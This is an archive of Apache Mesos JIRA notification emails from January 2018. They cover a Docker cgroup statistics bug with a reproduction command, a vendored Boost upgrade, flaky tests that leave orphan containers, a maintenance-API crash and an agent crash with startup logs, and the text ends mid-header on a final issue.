[{{DockerContainerizerProcess::cgroupsStatistics()}}|https://github.com/apache/mesos/blob/master/src/slave/containerizer/docker.cpp#L1991]
 read {{/sys/fs/cgroup/cpuacct///cpuacct.stat}}, which contains the statistics 
for the root cgroup:
{noformat}
user 228058750
system 24506461
{noformat}

This can be reproduced through test.cpp with the following command:
{noformat}
$ docker run --name sleep -d --rm alpine sleep 1000; ./test $(docker inspect 
sleep | jq .[].State.Pid) & sleep 1 && docker rm -f sleep
...

Reading file '/proc/44224/cgroup'
Reading file 
'/sys/fs/cgroup/cpuacct//docker/1d79a6c877e2af3081630aa57d23d853e6bd7d210dad28f897556bfea20bc9c1/cpuacct.stat'
user 4
system 0

Reading file '/proc/44224/cgroup'
Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat'
user 228058750
system 24506461

Reading file '/proc/44224/cgroup'
Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat'
user 228058750
system 24506461

Failed to open file '/proc/44224/cgroup'
sleep
[2]-  Exit 1  ./test $(docker inspect sleep | jq .[].State.Pid)
{noformat}


> Mesos returns high resource usage when killing a Docker task.
> -
>
> Key: MESOS-8480
> URL: https://issues.apache.org/jira/browse/MESOS-8480
> Project: Mesos
>  Issue Type: Bug
>  Components: cgroups
>Reporter: Chun-Hung Hsiao
>Assignee: Chun-Hung Hsiao
>Priority: Major
> Attachments: test.cpp
>
>
> The way we get resource statistics for Docker tasks is through getting the 
> cgroup subsystem path through {{/proc//docker}} first (taking the 
> {{cpuacct}} subsystem as an example):
> {noformat}
> 9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b
> {noformat}
> Then read 
> 

[jira] [Updated] (MESOS-8480) Mesos returns high resource usage when killing a Docker task.

2018-01-23 Thread Chun-Hung Hsiao (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8480?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Chun-Hung Hsiao updated MESOS-8480:
---
Attachment: test.cpp

> Mesos returns high resource usage when killing a Docker task.
> -
>
> Key: MESOS-8480
> URL: https://issues.apache.org/jira/browse/MESOS-8480
> Project: Mesos
>  Issue Type: Bug
>  Components: cgroups
>Reporter: Chun-Hung Hsiao
>Assignee: Chun-Hung Hsiao
>Priority: Major
> Attachments: test.cpp
>
>
> The way we get resource statistics for Docker tasks is through getting the 
> cgroup subsystem path through {{/proc//docker}} first (taking the 
> {{cpuacct}} subsystem as an example):
> {noformat}
> 9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b
> {noformat}
> Then read 
> {{/sys/fs/cgroup/cpuacct//docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b/cpuacct.stat}}
>  to get the statistics:
> {noformat}
> user 4
> system 0
> {noformat}
> However, when a Docker container is being teared down, it seems that Docker 
> or the operation system will first move the process to the root cgroup before 
> actually killing it, making {{/proc//docker}} look like the following:
> {noformat}
> 9:cpuacct,cpu:/
> {noformat}
> This makes 
> [{{cgroup::internal::cgroup()}}|https://github.com/apache/mesos/blob/master/src/linux/cgroups.cpp#L1935]
>  return a single '/', which in turn makes 
> [{{DockerContainerizerProcess::cgroupsStatistics()}}|https://github.com/apache/mesos/blob/master/src/slave/containerizer/docker.cpp#L1991]
>  read {{/sys/fs/cgroup/cpuacct///cpuacct.stat}}, which contains the 
> statistics for the root cgroup:
> {noformat}
> user 228058750
> system 24506461
> {noformat}
> This can be reproduced through test.cpp with the following command:
> {noformat}
> $ docker run --name sleep -d --rm alpine sleep 1000; ./test $(docker inspect 
> sleep | jq .[].State.Pid) & sleep 1 && docker rm -f sleep
> ...
> Reading file '/proc/44224/cgroup'
> Reading file 
> '/sys/fs/cgroup/cpuacct//docker/1d79a6c877e2af3081630aa57d23d853e6bd7d210dad28f897556bfea20bc9c1/cpuacct.stat'
> user 4
> system 0
> Reading file '/proc/44224/cgroup'
> Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat'
> user 228058750
> system 24506461
> Reading file '/proc/44224/cgroup'
> Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat'
> user 228058750
> system 24506461
> Failed to open file '/proc/44224/cgroup'
> sleep
> [2]-  Exit 1  ./test $(docker inspect sleep | jq 
> .[].State.Pid)
> {noformat}



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Created] (MESOS-8480) Mesos returns high resource usage when killing a Docker task.

2018-01-23 Thread Chun-Hung Hsiao (JIRA)
Chun-Hung Hsiao created MESOS-8480:
--

 Summary: Mesos returns high resource usage when killing a Docker 
task.
 Key: MESOS-8480
 URL: https://issues.apache.org/jira/browse/MESOS-8480
 Project: Mesos
  Issue Type: Bug
  Components: cgroups
Reporter: Chun-Hung Hsiao
Assignee: Chun-Hung Hsiao


The way we get resource statistics for Docker tasks is through getting the 
cgroup subsystem path through {{/proc//docker}} first (taking the 
{{cpuacct}} subsystem as an example):
{noformat}
9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b
{noformat}
Then read 
{{/sys/fs/cgroup/cpuacct//docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b/cpuacct.stat}}
 to get the statistics:
{noformat}
user 4
system 0
{noformat}

However, when a Docker container is being teared down, it seems that Docker or 
the operation system will first move the process to the root cgroup before 
actually killing it, making {{/proc//docker}} look like the following:
{noformat}
9:cpuacct,cpu:/
{noformat}
This makes 
[{{cgroup::internal::cgroup()}}|https://github.com/apache/mesos/blob/master/src/linux/cgroups.cpp#L1935]
 return a single '/', which in turn makes 
[{{DockerContainerizerProcess::cgroupsStatistics()}}|https://github.com/apache/mesos/blob/master/src/slave/containerizer/docker.cpp#L1991]
 read {{/sys/fs/cgroup/cpuacct///cpuacct.stat}}, which contains the statistics 
for the root cgroup:
{noformat}
user 228058750
system 24506461
{noformat}

This can be reproduced through test.cpp with the following command:
{noformat}
$ docker run --name sleep -d --rm alpine sleep 1000; ./test $(docker inspect 
sleep | jq .[].State.Pid) & sleep 1 && docker rm -f sleep
...

Reading file '/proc/44224/cgroup'
Reading file 
'/sys/fs/cgroup/cpuacct//docker/1d79a6c877e2af3081630aa57d23d853e6bd7d210dad28f897556bfea20bc9c1/cpuacct.stat'
user 4
system 0

Reading file '/proc/44224/cgroup'
Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat'
user 228058750
system 24506461

Reading file '/proc/44224/cgroup'
Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat'
user 228058750
system 24506461

Failed to open file '/proc/44224/cgroup'
sleep
[2]-  Exit 1  ./test $(docker inspect sleep | jq .[].State.Pid)
{noformat}



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Created] (MESOS-8479) Document agne SIGUSR1 behavior.

2018-01-23 Thread James Peach (JIRA)
James Peach created MESOS-8479:
--

 Summary: Document agne SIGUSR1 behavior.
 Key: MESOS-8479
 URL: https://issues.apache.org/jira/browse/MESOS-8479
 Project: Mesos
  Issue Type: Bug
  Components: agent, documentation
Reporter: James Peach


The agent enters shutdown when it receives {{SIGUSR1}}. We should document what 
this means, the corresponding behavior and how operators are intended to use 
this.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-3915) Upgrade vendored Boost

2018-01-23 Thread Benjamin Bannier (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-3915?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Benjamin Bannier updated MESOS-3915:

Shepherd: Benjamin Bannier

> Upgrade vendored Boost
> --
>
> Key: MESOS-3915
> URL: https://issues.apache.org/jira/browse/MESOS-3915
> Project: Mesos
>  Issue Type: Bug
>Reporter: Neil Conway
>Assignee: Benno Evers
>Priority: Minor
>  Labels: boost, mesosphere, tech-debt
> Fix For: 1.6.0
>
>
> We should upgrade the vendored version of Boost to a newer version. Benefits:
> * -Should properly fix MESOS-688-
> * -Should fix MESOS-3799-
> * Generally speaking, using a more modern version of Boost means we can take 
> advantage of bug fixes, optimizations, and new features.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Commented] (MESOS-3915) Upgrade vendored Boost

2018-01-23 Thread Benjamin Bannier (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-3915?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16336296#comment-16336296
 ] 

Benjamin Bannier commented on MESOS-3915:
-

{noformat}
commit ce0905fcb31a10ade0962a89235fa90b01edf01a
Author: Benjamin Bannier 
Date:   Tue Jan 23 14:47:37 2018 +0100

Updated mesos-tidy setup for upgraded Boost version.

In a previous commit we updated the bundled Boost version. This patch
updates the mesos-tidy setup to make sure we build the correct bundled
Boost version when creating analysis prerequisites.

Review: https://reviews.apache.org/r/65215/

commit a01b4c272848702d5bd3dd899e610a5459c4e57c
Author: Benno Evers 
Date:   Tue Jan 23 14:47:32 2018 +0100

Removed duplicate block in configure.ac.

This blocks seems to have been copy/pasted from another place.

Review: https://reviews.apache.org/r/62445/

commit 469363d4322c7acda7fd10acbe8822f610af5a43
Author: Benno Evers 
Date:   Tue Jan 23 14:47:31 2018 +0100

Updated boost version.

Review: https://reviews.apache.org/r/62161/

commit cd2774efde5e55cc027721086af14fbc78688849
Author: Benno Evers 
Date:   Tue Jan 23 14:47:28 2018 +0100

Added UNREACHABLE() macro to __cxa_pure_virtual.

The function __cxa_pure_virtual must not return,
but newer versions of clang detect that the expansion
of the RAW_LOG() macro contains returning code paths
for arguments other than FATAL.

Review: https://reviews.apache.org/r/62444/

commit a892a2e80255291e6cd5cb3b0e90b9a029989c99
Author: Benno Evers 
Date:   Tue Jan 23 14:47:24 2018 +0100

Fixed stout build with newer boost versions.

Starting from Boost 1.62, Boost.Variant added additional
compile-time checks to its constructors to fix this
issue: https://svn.boost.org/trac10/ticket/11602

However, this breaks some places in stout which try
to access a derived class from a variant holding the
base class.

Review: https://reviews.apache.org/r/62160/
{noformat}

> Upgrade vendored Boost
> --
>
> Key: MESOS-3915
> URL: https://issues.apache.org/jira/browse/MESOS-3915
> Project: Mesos
>  Issue Type: Bug
>Reporter: Neil Conway
>Assignee: Benno Evers
>Priority: Minor
>  Labels: boost, mesosphere, tech-debt
> Fix For: 1.6.0
>
>
> We should upgrade the vendored version of Boost to a newer version. Benefits:
> * -Should properly fix MESOS-688-
> * -Should fix MESOS-3799-
> * Generally speaking, using a more modern version of Boost means we can take 
> advantage of bug fixes, optimizations, and new features.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Assigned] (MESOS-3915) Upgrade vendored Boost

2018-01-23 Thread Benjamin Bannier (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-3915?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Benjamin Bannier reassigned MESOS-3915:
---

   Resolution: Fixed
 Assignee: Benno Evers
Fix Version/s: 1.6.0

Closing this one as we have moved the bundled Boost to 1.65.0 after fixing 
issues preventing such an upgrade.

> Upgrade vendored Boost
> --
>
> Key: MESOS-3915
> URL: https://issues.apache.org/jira/browse/MESOS-3915
> Project: Mesos
>  Issue Type: Bug
>Reporter: Neil Conway
>Assignee: Benno Evers
>Priority: Minor
>  Labels: boost, mesosphere, tech-debt
> Fix For: 1.6.0
>
>
> We should upgrade the vendored version of Boost to a newer version. Benefits:
> * -Should properly fix MESOS-688-
> * -Should fix MESOS-3799-
> * Generally speaking, using a more modern version of Boost means we can take 
> advantage of bug fixes, optimizations, and new features.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Comment Edited] (MESOS-7506) Multiple tests leave orphan containers.

2018-01-23 Thread Andrei Budnik (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-7506?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16336272#comment-16336272
 ] 

Andrei Budnik edited comment on MESOS-7506 at 1/23/18 7:20 PM:
---

While recovery is in progress for [the first 
slave|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/tests/containerizer/linux_capabilities_isolator_tests.cpp#L733],
 calling 
[`StartSlave()`|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/tests/containerizer/linux_capabilities_isolator_tests.cpp#L738]
 leads to calling 
[slave::Containerizer::create()|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/tests/cluster.cpp#L431]
 to create a containerizer. An attempt to create a mesos c'zer, leads to 
calling 
[`cgroups::prepare`|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/slave/containerizer/mesos/linux_launcher.cpp#L124].
 Finally, we get to the point, where we try to create a ["test" 
container|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/linux/cgroups.cpp#L476].
 So, the recovery process for the first slave [might 
detect|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/slave/containerizer/mesos/linux_launcher.cpp#L268-L301]
 this "test" container as an orphaned container.

So, there is the race between recovery process for the first slave and an 
attempt to create a c'zer for the second agent.


was (Author: abudnik):
While recovery is in progress for [the first 
slave|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/tests/containerizer/linux_capabilities_isolator_tests.cpp#L733],
 calling 
[`StartSlave()`|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/tests/containerizer/linux_capabilities_isolator_tests.cpp#L738]
 leads to calling 
[slave::Containerizer::create()|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/tests/cluster.cpp#L431]
 to create a containerizer. An attempt to create a mesos c'zer, leads to 
calling 
[`cgroups::prepare`|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/slave/containerizer/mesos/linux_launcher.cpp#L124].
 Finally, we get to the point, where we try to create a ["test" 
container|[https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/linux/cgroups.cpp#L476].]
 So, the recovery process for the first slave [might 
detect|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/slave/containerizer/mesos/linux_launcher.cpp#L268-L301]
 this "test" container as an orphaned container.

So, there is the race between recovery process for the first slave and an 
attempt to create a c'zer for the second agent.

> Multiple tests leave orphan containers.
> ---
>
> Key: MESOS-7506
> URL: https://issues.apache.org/jira/browse/MESOS-7506
> Project: Mesos
>  Issue Type: Bug
>  Components: containerization
> Environment: Ubuntu 16.04
> Fedora 23
> other Linux distros
>Reporter: Alexander Rukletsov
>Assignee: Andrei Budnik
>Priority: Major
>  Labels: containerizer, flaky-test, mesosphere
> Attachments: KillMultipleTasks-badrun.txt, 
> ROOT_IsolatorFlags-badrun.txt, ROOT_IsolatorFlags-badrun2.txt, 
> ROOT_IsolatorFlags-badrun3.txt, ReconcileTasksMissingFromSlave-badrun.txt, 
> ResourceLimitation-badrun.txt, ResourceLimitation-badrun2.txt, 
> RestartSlaveRequireExecutorAuthentication-badrun.txt, 
> TaskWithFileURI-badrun.txt
>
>
> I've observed a number of flaky tests that leave orphan containers upon 
> cleanup. A typical log looks like this:
> {noformat}
> ../../src/tests/cluster.cpp:580: Failure
> Value of: containers->empty()
>   Actual: false
> Expected: true
> Failed to destroy containers: { da3e8aa8-98e7-4e72-a8fd-5d0bae960014 }
> {noformat}
> All currently affected tests:
> {noformat}
> SlaveTest.RestartSlaveRequireExecutorAuthentication // cannot reproduce any 
> more
> ROOT_IsolatorFlags
> {noformat}



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Commented] (MESOS-7506) Multiple tests leave orphan containers.

2018-01-23 Thread Andrei Budnik (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-7506?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16336272#comment-16336272
 ] 

Andrei Budnik commented on MESOS-7506:
--

While recovery is in progress for [the first 
slave|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/tests/containerizer/linux_capabilities_isolator_tests.cpp#L733],
 calling 
[`StartSlave()`|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/tests/containerizer/linux_capabilities_isolator_tests.cpp#L738]
 leads to calling 
[slave::Containerizer::create()|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/tests/cluster.cpp#L431]
 to create a containerizer. An attempt to create a mesos c'zer, leads to 
calling 
[`cgroups::prepare`|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/slave/containerizer/mesos/linux_launcher.cpp#L124].
 Finally, we get to the point, where we try to create a ["test" 
container|[https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/linux/cgroups.cpp#L476].]
 So, the recovery process for the first slave [might 
detect|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/slave/containerizer/mesos/linux_launcher.cpp#L268-L301]
 this "test" container as an orphaned container.

So, there is the race between recovery process for the first slave and an 
attempt to create a c'zer for the second agent.

> Multiple tests leave orphan containers.
> ---
>
> Key: MESOS-7506
> URL: https://issues.apache.org/jira/browse/MESOS-7506
> Project: Mesos
>  Issue Type: Bug
>  Components: containerization
> Environment: Ubuntu 16.04
> Fedora 23
> other Linux distros
>Reporter: Alexander Rukletsov
>Assignee: Andrei Budnik
>Priority: Major
>  Labels: containerizer, flaky-test, mesosphere
> Attachments: KillMultipleTasks-badrun.txt, 
> ROOT_IsolatorFlags-badrun.txt, ROOT_IsolatorFlags-badrun2.txt, 
> ROOT_IsolatorFlags-badrun3.txt, ReconcileTasksMissingFromSlave-badrun.txt, 
> ResourceLimitation-badrun.txt, ResourceLimitation-badrun2.txt, 
> RestartSlaveRequireExecutorAuthentication-badrun.txt, 
> TaskWithFileURI-badrun.txt
>
>
> I've observed a number of flaky tests that leave orphan containers upon 
> cleanup. A typical log looks like this:
> {noformat}
> ../../src/tests/cluster.cpp:580: Failure
> Value of: containers->empty()
>   Actual: false
> Expected: true
> Failed to destroy containers: { da3e8aa8-98e7-4e72-a8fd-5d0bae960014 }
> {noformat}
> All currently affected tests:
> {noformat}
> SlaveTest.RestartSlaveRequireExecutorAuthentication // cannot reproduce any 
> more
> ROOT_IsolatorFlags
> {noformat}



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Commented] (MESOS-6804) Running 'tty' inside a debug container that has a tty reports "Not a tty"

2018-01-23 Thread Vinod Kone (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-6804?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16336247#comment-16336247
 ] 

Vinod Kone commented on MESOS-6804:
---

Making this an improvement because tty applications work properly. The only 
issue is if someone types `tty` after attaching.

> Running 'tty' inside a debug container that has a tty reports "Not a tty"
> -
>
> Key: MESOS-6804
> URL: https://issues.apache.org/jira/browse/MESOS-6804
> Project: Mesos
>  Issue Type: Improvement
>Reporter: Kevin Klues
>Priority: Major
>  Labels: debugging, mesosphere
>
> We need to inject `/dev/console` into the container and map it to the slave 
> end of the TTY we are attached to.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-6804) Running 'tty' inside a debug container that has a tty reports "Not a tty"

2018-01-23 Thread Vinod Kone (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-6804?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Vinod Kone updated MESOS-6804:
--
Priority: Major  (was: Critical)

> Running 'tty' inside a debug container that has a tty reports "Not a tty"
> -
>
> Key: MESOS-6804
> URL: https://issues.apache.org/jira/browse/MESOS-6804
> Project: Mesos
>  Issue Type: Improvement
>Reporter: Kevin Klues
>Priority: Major
>  Labels: debugging, mesosphere
>
> We need to inject `/dev/console` into the container and map it to the slave 
> end of the TTY we are attached to.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-6804) Running 'tty' inside a debug container that has a tty reports "Not a tty"

2018-01-23 Thread Vinod Kone (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-6804?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Vinod Kone updated MESOS-6804:
--
Issue Type: Improvement  (was: Bug)

> Running 'tty' inside a debug container that has a tty reports "Not a tty"
> -
>
> Key: MESOS-6804
> URL: https://issues.apache.org/jira/browse/MESOS-6804
> Project: Mesos
>  Issue Type: Improvement
>Reporter: Kevin Klues
>Priority: Critical
>  Labels: debugging, mesosphere
>
> We need to inject `/dev/console` into the container and map it to the slave 
> end of the TTY we are attached to.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-7966) check for maintenance on agent causes fatal error

2018-01-23 Thread Vinod Kone (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-7966?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Vinod Kone updated MESOS-7966:
--
Sprint: Mesosphere Sprint 66, Mesosphere Sprint 74  (was: Mesosphere Sprint 
66)

> check for maintenance on agent causes fatal error
> -
>
> Key: MESOS-7966
> URL: https://issues.apache.org/jira/browse/MESOS-7966
> Project: Mesos
>  Issue Type: Bug
>  Components: master
>Affects Versions: 1.1.0
>Reporter: Rob Johnson
>Assignee: Joseph Wu
>Priority: Critical
>  Labels: reliability
>
> We interact with the maintenance API frequently to orchestrate gracefully 
> draining agents of tasks without impacting service availability.
> Occasionally we seem to trigger a fatal error in Mesos when interacting with 
> the api. This happens relatively frequently, and impacts us when downstream 
> frameworks (marathon) react badly to leader elections.
> Here is the log line that we see when the master dies:
> {code}
> F0911 12:18:49.543401 123748 hierarchical.cpp:872] Check failed: 
> slaves[slaveId].maintenance.isSome()
> {code}
> It's quite possibly we're using the maintenance API in the wrong way. We're 
> happy to provide any other logs you need - please let me know what would be 
> useful for debugging.
> Thanks.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Commented] (MESOS-7966) check for maintenance on agent causes fatal error

2018-01-23 Thread Vinod Kone (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-7966?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16336243#comment-16336243
 ] 

Vinod Kone commented on MESOS-7966:
---

[~kaysoky] Can you work on it in this sprint?

> check for maintenance on agent causes fatal error
> -
>
> Key: MESOS-7966
> URL: https://issues.apache.org/jira/browse/MESOS-7966
> Project: Mesos
>  Issue Type: Bug
>  Components: master
>Affects Versions: 1.1.0
>Reporter: Rob Johnson
>Assignee: Joseph Wu
>Priority: Critical
>  Labels: reliability
>
> We interact with the maintenance API frequently to orchestrate gracefully 
> draining agents of tasks without impacting service availability.
> Occasionally we seem to trigger a fatal error in Mesos when interacting with 
> the api. This happens relatively frequently, and impacts us when downstream 
> frameworks (marathon) react badly to leader elections.
> Here is the log line that we see when the master dies:
> {code}
> F0911 12:18:49.543401 123748 hierarchical.cpp:872] Check failed: 
> slaves[slaveId].maintenance.isSome()
> {code}
> It's quite possibly we're using the maintenance API in the wrong way. We're 
> happy to provide any other logs you need - please let me know what would be 
> useful for debugging.
> Thanks.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Assigned] (MESOS-7966) check for maintenance on agent causes fatal error

2018-01-23 Thread Vinod Kone (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-7966?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Vinod Kone reassigned MESOS-7966:
-

Assignee: Joseph Wu  (was: Alexander Rukletsov)

> check for maintenance on agent causes fatal error
> -
>
> Key: MESOS-7966
> URL: https://issues.apache.org/jira/browse/MESOS-7966
> Project: Mesos
>  Issue Type: Bug
>  Components: master
>Affects Versions: 1.1.0
>Reporter: Rob Johnson
>Assignee: Joseph Wu
>Priority: Critical
>  Labels: reliability
>
> We interact with the maintenance API frequently to orchestrate gracefully 
> draining agents of tasks without impacting service availability.
> Occasionally we seem to trigger a fatal error in Mesos when interacting with 
> the api. This happens relatively frequently, and impacts us when downstream 
> frameworks (marathon) react badly to leader elections.
> Here is the log line that we see when the master dies:
> {code}
> F0911 12:18:49.543401 123748 hierarchical.cpp:872] Check failed: 
> slaves[slaveId].maintenance.isSome()
> {code}
> It's quite possibly we're using the maintenance API in the wrong way. We're 
> happy to provide any other logs you need - please let me know what would be 
> useful for debugging.
> Thanks.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-7622) Agent can crash if a HTTP executor tries to retry subscription in running state.

2018-01-23 Thread Vinod Kone (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-7622?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Vinod Kone updated MESOS-7622:
--
Sprint: Mesosphere Sprint 74

> Agent can crash if a HTTP executor tries to retry subscription in running 
> state.
> 
>
> Key: MESOS-7622
> URL: https://issues.apache.org/jira/browse/MESOS-7622
> Project: Mesos
>  Issue Type: Bug
>  Components: agent, executor
>Affects Versions: 1.2.2
>Reporter: Aaron Wood
>Assignee: Anand Mazumdar
>Priority: Critical
>
> It is possible that a running executor might retry its subscribe request. 
> This can lead to a crash if it previously had any launched tasks. Note that 
> the executor would still be able to subscribe again when the agent process 
> restarts and is recovering.
> {code}
> sudo ./mesos-agent --master=10.0.2.15:5050 --work_dir=/tmp/slave 
> --isolation=cgroups/cpu,cgroups/mem,disk/du,network/cni,filesystem/linux,docker/runtime
>  --image_providers=docker --image_provisioner_backend=overlay 
> --containerizers=mesos --launcher_dir=$(pwd) 
> --executor_environment_variables='{"LD_LIBRARY_PATH": 
> "/home/aaron/Code/src/mesos/build/src/.libs"}'
> WARNING: Logging before InitGoogleLogging() is written to STDERR
> I0605 14:58:23.748180 10710 main.cpp:323] Build: 2017-06-02 17:09:05 UTC by 
> aaron
> I0605 14:58:23.748252 10710 main.cpp:324] Version: 1.4.0
> I0605 14:58:23.755409 10710 systemd.cpp:238] systemd version `232` detected
> I0605 14:58:23.755450 10710 main.cpp:433] Initializing systemd state
> I0605 14:58:23.763049 10710 systemd.cpp:326] Started systemd slice 
> `mesos_executors.slice`
> I0605 14:58:23.763777 10710 resolver.cpp:69] Creating default secret resolver
> I0605 14:58:23.764214 10710 containerizer.cpp:230] Using isolation: 
> cgroups/cpu,cgroups/mem,disk/du,network/cni,filesystem/linux,docker/runtime,volume/image,environment_secret
> I0605 14:58:23.767192 10710 linux_launcher.cpp:150] Using 
> /sys/fs/cgroup/freezer as the freezer hierarchy for the Linux launcher
> E0605 14:58:23.770179 10710 shell.hpp:107] Command 'hadoop version 2>&1' 
> failed; this is the output:
> sh: 1: hadoop: not found
> I0605 14:58:23.770217 10710 fetcher.cpp:69] Skipping URI fetcher plugin 
> 'hadoop' as it could not be created: Failed to create HDFS client: Failed to 
> execute 'hadoop version 2>&1'; the command was either not found or exited 
> with a non-zero exit status: 127
> I0605 14:58:23.770643 10710 provisioner.cpp:255] Using default backend 
> 'overlay'
> I0605 14:58:23.785892 10710 slave.cpp:248] Mesos agent started on 
> (1)@127.0.1.1:5051
> I0605 14:58:23.785957 10710 slave.cpp:249] Flags at startup: 
> --appc_simple_discovery_uri_prefix="http://; 
> --appc_store_dir="/tmp/mesos/store/appc" --authenticate_http_readonly="false" 
> --authenticate_http_readwrite="false" --authenticatee="crammd5" 
> --authentication_backoff_factor="1secs" --authorizer="local" 
> --cgroups_cpu_enable_pids_and_tids_count="false" --cgroups_enable_cfs="false" 
> --cgroups_hierarchy="/sys/fs/cgroup" --cgroups_limit_swap="false" 
> --cgroups_root="mesos" --container_disk_watch_interval="15secs" 
> --containerizers="mesos" --default_role="*" --disk_watch_interval="1mins" 
> --docker="docker" --docker_kill_orphans="true" 
> --docker_registry="https://registry-1.docker.io; --docker_remove_delay="6hrs" 
> --docker_socket="/var/run/docker.sock" --docker_stop_timeout="0ns" 
> --docker_store_dir="/tmp/mesos/store/docker" 
> --docker_volume_checkpoint_dir="/var/run/mesos/isolators/docker/volume" 
> --enforce_container_disk_quota="false" 
> --executor_environment_variables="{"LD_LIBRARY_PATH":"\/home\/aaron\/Code\/src\/mesos\/build\/src\/.libs"}"
>  --executor_registration_timeout="1mins" 
> --executor_reregistration_timeout="2secs" 
> --executor_shutdown_grace_period="5secs" 
> --fetcher_cache_dir="/tmp/mesos/fetch" --fetcher_cache_size="2GB" 
> --frameworks_home="" --gc_delay="1weeks" --gc_disk_headroom="0.1" 
> --hadoop_home="" --help="false" --hostname_lookup="true" 
> --http_command_executor="false" --http_heartbeat_interval="30secs" 
> --image_providers="docker" --image_provisioner_backend="overlay" 
> --initialize_driver_logging="true" 
> --isolation="cgroups/cpu,cgroups/mem,disk/du,network/cni,filesystem/linux,docker/runtime"
>  --launcher="linux" --launcher_dir="/home/aaron/Code/src/mesos/build/src" 
> --logbufsecs="0" --logging_level="INFO" --master="10.0.2.15:5050" 
> --max_completed_executors_per_framework="150" 
> --oversubscribed_resources_interval="15secs" --perf_duration="10secs" 
> --perf_interval="1mins" --port="5051" --qos_correction_interval_min="0ns" 
> --quiet="false" --recover="reconnect" --recovery_timeout="15mins" 
> --registration_backoff_factor="1secs" --revocable_cpu_low_priority="true" 
> 

[jira] [Updated] (MESOS-7911) Non-checkpointing framework's tasks should not be marked LOST when agent disconnects.

2018-01-23 Thread Vinod Kone (JIRA)

 [ 
